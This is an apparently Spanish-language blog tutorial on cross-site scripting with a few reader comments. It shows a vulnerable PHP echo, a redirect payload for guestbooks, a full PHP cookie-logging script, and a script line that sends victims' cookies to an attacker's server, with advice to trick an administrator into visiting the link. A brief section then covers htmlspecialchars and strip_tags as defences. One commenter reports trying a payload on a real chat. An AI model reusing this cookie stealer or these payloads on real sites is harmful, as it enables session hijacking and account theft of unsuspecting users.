El siguiente tutorial esta escrito por mi 100%, en el podreis ver como vulnerar o fixear(reparar) un XSS. Lo podeis ver en mi blog, http://4cosas.com

Definicion
El XSS es un ataque explotando una inyeccion HTML en un sistema web. Mucha gente piensa el que solo sirva para redireccionar las visitas d ela web victima a otra web, deformar la web victima, etc...

Codigo Vulnerable:
Un ejemplo de vulnerabilidad XSS seria...

<?
echo $_GET[&#39;id&#39;];
?>

le entramos desde file.php?id=hola <h1>capullo</h1> y como veremos sale la frase "hola capullo" con la palbra capullo en negrita, lo que significa que se puede meter codigo HTML desde una variable en la url.

Como explotar un XSS
Hay miles de formas de explotar un XSS, su por ejemplo se tratara de un tagboard vulnerable a XSS en los mensajes y te interesa redireccionar las viistas de la web pues tan solo bastaria con meter un code HTML de redireccion, por ejemplo:
<META HTTP-EQUIV='Refresh' CONTENT='1; URL=http://4cosas.com/hacked.html'>ese code redireccionaria las visitas, ideal para tags, guestbooks, etc.

Tambien podemos explotar el XSS robando las cookies del usuario, ahora es cuando tambien entra la ingenieria social, seria el hacer que el admin entre a una url, enviandole un email diciendole k entro o yo que se, eso lo pensais vosotros Para robarle las cookies deberiamos crear antes que nada nosotros un code php como el siguiente:

<?php
$archivo = fopen(&#39;log.htm&#39;,&#39;a&#39;);
$ip = getenv (&#39;REMOTE_ADDR&#39;);
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, &#39;<br>Cookies de usuario de&#39;.$re.&#39;.<br>IP:&#39;.$ip.&#39;<br>Fecha:&#39;.$fecha.&#39;<br>Cookies:<br>&#39;.$_GET[&#39;c&#39;].&#39;<br>&#39;);
fclose($archivo);
?>
Lo llamaremos log.php por dar un ejemplo, y crearemos el archivo log.htm donde se guardaran las cookies que robemos. Ahora para robar las cookies lo que tenemos que hacer es meter el siguiente script en la web vulnerable:
<script>window.location='http://tuweb.com/log.php?c='+document.cookie;</script>la persona que visite la web vulnerable infectada por ese code se le robaran sus cookies. Asi de simple podremos explotar el XSS.

Protegerse de XSS
Para protegernos de XSS el php ofrece distintas funciones. En este caso usaremos htmlspecialchars(), se usaria asi:
<?
echo htmlspecialchars($_GET[&#39;id&#39;]);
?>
de esta forma mostrara el HTML, pero no lo ejecutara. Si por el contrario quieres que borre todo el HTML, es decir que ni lo muestre usariamos la funcion strip_tags(), esta borra todo codigo HTML.

Aquí teneis mas informacion sobre codigos XSS: http://ha.ckers.org/xss.html

¿Como que no se ve? Seguro que si se ve ahora...

Datos... Ejemplo el usuario y password alguna web o algo asi

jaja, al poner el code de abajo en el minichat infokeko me ha mostrado el nombre de un usuario  xD
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
me mostro asi:
<OBJECT classid=clsid:ae24fdaeron-03c6-11d1-8b76-0080c744f389><param name=url

Eso de htmlspecialchars y strip_tags, puedes meter dentro de eso el codigo entero o debes meter x partes?